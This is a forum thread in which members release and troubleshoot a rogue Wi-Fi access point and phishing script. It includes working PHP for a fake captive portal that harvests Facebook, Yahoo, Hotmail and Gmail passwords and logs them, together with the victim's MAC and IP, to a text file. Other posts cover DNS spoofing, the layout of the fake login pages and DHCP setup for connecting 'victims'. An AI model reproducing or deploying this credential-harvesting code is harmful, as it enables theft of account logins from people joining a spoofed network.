Soft AP / Phishing Script [Release]

[VulpiArgenti]

@Bl4ckSky, you are using Google DNS (cue posts about privacy )
The script expects local DNS (e.g. 192.168.1.1)
Your easiest option might be to add a local DNS address (usually the same as your router/gateway) to your network (which should then update resolv.conf automatically).

[VulpiArgenti]

@VulpiArgenti, can you upload what you have so far with the new captive portal method? I'm not the greatest with php but I can take a look at it.

Hey devi1, thanks indeed for the offer; was about to upload when I realised I've just fixed it . The only problem was that "global $mac" was in the wrong place, so $mac was not being passed to iptables.
I'm actually going to leave the script as it is; the workaround with dnotify turns out to be useful (in setting iptables rules for sslstrip).

Here's the (not pretty but working) service.php

PHP Code:

<?php 
 
//Thanks to: 
//http://www.andybev.com/index.php/Using_iptables_and_PHP_to_create_a_captive_portal 
//http://simple-and-hot.blogspot.com.au/2010/05/you-can-do-it-yourself.html 
//devi1 
 
//error_reporting(E_ALL); 
//ini_set ('display_errors', '1'); 
 
$name = $_POST['login']; 
$password = $_POST['password']; 
 
if($_POST['facebook']){ 
    $service = "facebook"; 
}elseif($_POST['yahoo']){ 
    $service = "yahoo"; 
}elseif($_POST['hotmail']){ 
    $service = "hotmail"; 
}elseif($_POST['gmail']){ 
    $service = "gmail"; 
} 
 
 
sleep(1); 
 
$error = 
"<html>\n" . 
"<head>\n" . 
"<meta http-equiv=\"Refresh\" content=\"5;url=/\" />\n" . 
"</head>\n" . 
"<body>\n" . 
"<center><p1><b>Login incorrect.</b></p1></center>\n" . 
"<center><p1></p1></center>\n" . 
"</body>\n" . 
"</html>"; 
 
$success= 
"<html>\n" . 
"<head>\n" . 
"</head>\n" . 
"<body>\n" . 
"<center><p1>Authorized</p1></center>\n" . 
"<center><p1>Continue browsing</p1></center>\n" . 
"</body>\n" . 
"</html>"; 
 
 
$arp = "/usr/sbin/arp"; 
 
if(($password == "") || ($name == "")){ 
    echo $error;  // if credentials not entered 
} else {  
    // Attempt to get the client's mac address 
    $mac = shell_exec("$arp -a ".$_SERVER['REMOTE_ADDR']); 
    preg_match('/..:..:..:..:..:../',$mac , $matches); 
    @$mac = $matches[0]; 
  
    $ip = $_SERVER["REMOTE_ADDR"]; 
 
    $accinfo = "login: $name    pass: $password    service: $service\nMAC: $mac    IP: $ip\n----------------\n"; 
 
    // Write out the credentials 
    $fp = fopen("formdata.txt", "a"); 
    fwrite($fp, $accinfo); 
    fclose($fp); 
     
    if (!isset($mac)) { echo $error; 
    } else { 
        global $mac; 
        iptables(); 
        echo $success; } 
} 
function iptables() { 
     
        global $mac; 
        // Allow through the captive portal 
        exec("sudo /sbin/iptables -t nat -I PREROUTING -m mac --mac-source $mac -j ACCEPT"); 
        } 
?>

[ASTRAPI]

A video tutorial for option 3 will be great

[VulpiArgenti]

Good idea. Why don't you make one?

[ASTRAPI]

The Author knows better how to present it

[bugme]

hello VulpiArgenti, sorry i couldn't answer sooner...anyway when the victim connects the DCHP tail stays empty, and so the dnsspoof. the only signal i have about the connection is just the first eterm window, where i get the mac of the victim, and nothing else. so obviously the problem resides in the DHCP server...i tried to remove/reinstall the whole DHCP group but without success maybe something in the configuration of the server? i don't modify the default values you included in the script, i just add the channel of the fake ap. thank you again for your patience

Hi bugme,

Thanks for your comments - much appreciated.

Regarding the Eterm colours, you can see on the screenshot that they should be a very readable purple/yellow. Please launch Eterm then adjust the background settings: transparency off, pixmap none; then "save theme settings". This gives a blank background to show the script colours.

You shouldn't need to create any additional directories once you have moved "hotspot" into /var/www. Your directory setup should look like this:

Code:

root@bt:~# ls /var/www
hotspot  index.html  wstool
root@bt:~# ls /var/www/hotspot
facebookLogo.jpg  GmailLogo.png   HotmailLogo.png  process-form-data.php
formdata.txt      GoogleWifi.jpg  index.html       yahoo.gif

And then running the script (red is your entries):

Code:

Setting up the web page

MUST have directory structure set up correctly

Available web directories:
hotspot
index.html
wstool

Select directory
hotspot

hotspot/index moved into position

Starting Apache...
 * Starting web server apache2                                                [ OK ] 
...success

Starting DNS spoofing...

Do you want to tail the credentials txtfile? (y/n)
y


facebookLogo.jpg  GmailLogo.png   HotmailLogo.png  process-form-data.php
formdata.txt      GoogleWifi.jpg  index.html       yahoo.gif

Enter name of txtfile
formdata.txt

Web Server attack running

Try again with it set up like this.

If there are still problems we need to troubleshoot your victim's connection. Does a lease show up in the "DHCP Tail" eterm, and does the DNSSpoof eterm show activity?

[VulpiArgenti]

Hi bugme, it does sound like a DHCP problem. Could you post the config file the script generates (cat /tmp/dhcpd.conf)?

Also suggest trying a static IP (in the range 192.168.0.100-200) on your victim, and also different clients (smartphone etc)

[pr0l3]

Signed up for this forum specifically to respond to this post.

Fantastic script.

Just downloaded, going to play with it tonight.

[parrotface]

Hi
I am having trouble with dhcp
client connects and never gets an IP address
the file /tmp/dhcpd.conf does not exist
tried working through script and the line I am having problem with is
line 720 mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
I get invalid user dhcpd:dhcpd from the section "chown dhcpd:dhcpd /var/run/dhcpd"
is it permissions set wrong or some other basic problem ?
many thanks

[bugme]

Hi bugme, it does sound like a DHCP problem. Could you post the config file the script generates (cat /tmp/dhcpd.conf)?

Also suggest trying a static IP (in the range 192.168.0.100-200) on your victim, and also different clients (smartphone etc)

default-lease-time 300;
max-lease-time 360;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.0.0 netmask 255.255.255.0 {
range 192.168.0.100 192.168.0.200;
option routers 192.168.0.1;
option domain-name-servers 192.168.2.1;
}


i tried a couple of devices, with no real result...using a static IP in the range (192.168.0.101) indeed gave me a line with the name of the device in DHCP server tail, but no connection/spoof/fake html page on the victim